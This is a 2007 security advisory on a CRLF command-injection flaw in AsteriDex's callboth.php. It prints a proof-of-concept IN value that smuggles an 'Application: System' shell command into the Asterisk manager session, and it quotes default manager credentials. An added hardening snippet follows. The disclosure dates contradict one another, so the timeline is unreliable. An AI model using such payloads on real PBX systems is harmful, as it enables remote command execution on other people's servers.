
Monday, July 09, 2007

[UNIX] AsteriDex Code Execution (Asterisk and Trixbox)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - - - - - - - -

AsteriDex Code Execution (Asterisk and Trixbox)
------------------------------------------------------------------------


SUMMARY

AsteriDex (http://bestof.nerdvittles.com/applications/asteridex/) is "a
digital rolodex for Asterisk / Trixbox PBXs". There is a command injection
vulnerability which allows unauthenticated users to execute arbitrary
commands on the Asterisk management console. Such access permits execution
of arbitrary operating system commands as the 'asterisk' user.

DETAILS

Vulnerable Systems:
* AsteriDex version 3.0 and prior

The script 'callboth.php' is used by AsteriDex to bridge a VOIP call
between two end-points. Insufficient parameter checking is done on the
variables IN and OUT, allowing a malicious user to inject arbitrary
commands into the Asterisk management console.

The script works by logging into the console server on port 5038/TCP on
localhost. It then issues an 'Action: Originate' command which is used to
setup the bridged call. The relevant code from callboth.php is:

fputs($fp, "Action: login\r\n");
fputs($fp, "Username: phpagi\r\n");
fputs($fp, "Secret: phpagi\r\n");
fputs($fp, "Events: off\r\n\r\n");
sleep(1);
fputs($fp, "Action: Originate\r\n");
fputs($fp, "Channel: $IN\r\n");          // Command injection
fputs($fp, "Context: custom-callboth\r\n");
fputs($fp, "Exten: $OUT\r\n");           // Command injection
fputs($fp, "Priority: 1\r\n\r\n");

$IN is set from $_GET['IN'] with no sanity checking other than a test of
string length; all strings passed to $IN must be less than 100 chars,
including the string 'sip/' which is prepended to $IN prior to the length
check.

Given sane values of $IN=123, $OUT=321 and $CallerID=567, the session
would look like this:

Action: login
Username: phpagi
Secret: phpagi
Events: off

Action: Originate
Channel: 123
Context: custom-callboth
Exten: 321
Priority: 1

By including CRLF characters in $IN, an attacker can inject arbitrary
commands into the data stream, hijacking the authenticated session to run
commands of the attacker's choice. Take, for example, a $IN string
containing:
190@example.com\r\nApplication: System\r\nData: echo pwn3d > /tmp/hoku.txt\r\n

This would transform the session into:
Action: login
Username: phpagi
Secret: phpagi
Events: off

Action: Originate
Channel: 190@example.com
Application: System
Data: echo pwn3d > /tmp/hoku.txt

Context: custom-callboth
Exten: 321
Priority: 1

This would use the call manager's 'System' functionality to execute
user-supplied operating system commands, in this case writing the word
"pwn3d" to a file called "/tmp/hoku.txt". The rest of the session would
fail because the attacker has subverted the original 'Action', rendering
the remaining commands meaningless to the manager.
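The root cause is that caller-controlled values are written straight into the CRLF-framed manager protocol. The following is an added example, not AsteriDex's code or its vendor patch: a hardened version of the Originate sequence that whitelists the IN and OUT parameters and refuses any header value containing CR or LF, so the framing cannot be broken. The function names (ami_build_action, validate_channel, validate_exten, originate_bridged_call) and the digits-only extension rule are assumptions.

```php
<?php
// Added example (hypothetical helper names), not the original callboth.php.

// Every AMI header is "Key: value\r\n" and an action ends with a blank line.
// A value containing CR or LF would end the header early and smuggle extra
// headers such as "Application: System", so such values are rejected outright.
function ami_header_value_is_safe($value) {
    return is_string($value) && preg_match('/^[^\r\n\x00]*$/', $value) === 1;
}

// Whitelist the dial target to a narrow character set. The limit of 95
// keeps the result under 100 chars once 'sip/' is prepended, as in the
// original length check.
function validate_channel($in) {
    if (!is_string($in) || !preg_match('/^[A-Za-z0-9._@+-]{1,95}$/', $in)) {
        return false;
    }
    return 'sip/' . $in;
}

// Extensions are assumed to be digits only in the custom-callboth context.
function validate_exten($out) {
    return (is_string($out) && preg_match('/^[0-9]{1,20}$/', $out) === 1) ? $out : false;
}

// Serialise one action; throws if any value could break the protocol framing.
function ami_build_action($action, array $headers) {
    $msg = "Action: $action\r\n";
    foreach ($headers as $key => $value) {
        if (!ami_header_value_is_safe($value)) {
            throw new InvalidArgumentException("unsafe AMI header value for $key");
        }
        $msg .= "$key: $value\r\n";
    }
    return $msg . "\r\n";
}

// Replacement for the vulnerable fputs() sequence: validate first, then send.
function originate_bridged_call($fp, $in, $out) {
    $channel = validate_channel($in);
    $exten   = validate_exten($out);
    if ($channel === false || $exten === false) {
        return false; // reject the request instead of echoing input to the manager
    }
    fputs($fp, ami_build_action('Originate', array(
        'Channel'  => $channel,
        'Context'  => 'custom-callboth',
        'Exten'    => $exten,
        'Priority' => '1',
    )));
    return true;
}
```

With this in place the payload shown above fails validate_channel() before anything is written to port 5038, and a value that somehow reached ami_build_action() with an embedded CRLF would raise an exception rather than be sent.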

Solution:
A patched version of AsteriDex is available from:
<http://bestof.nerdvittles.com/applications/asteridex/>

Disclosure Timeline:
06/25/2007 - Vendor contacted.
06/03/2007 - Vendor contacted again, response received. Details sent to
vendor.
06/03/2007 - Patch issued and updated version available.
06/05/2007 - Advisory released.


ADDITIONAL INFORMATION

The information has been provided by Carl Livitt <carl@hoku.co.uk>.
The original article can be found at:
<http://www.hoku.co.uk/advisories/asteridex.txt>
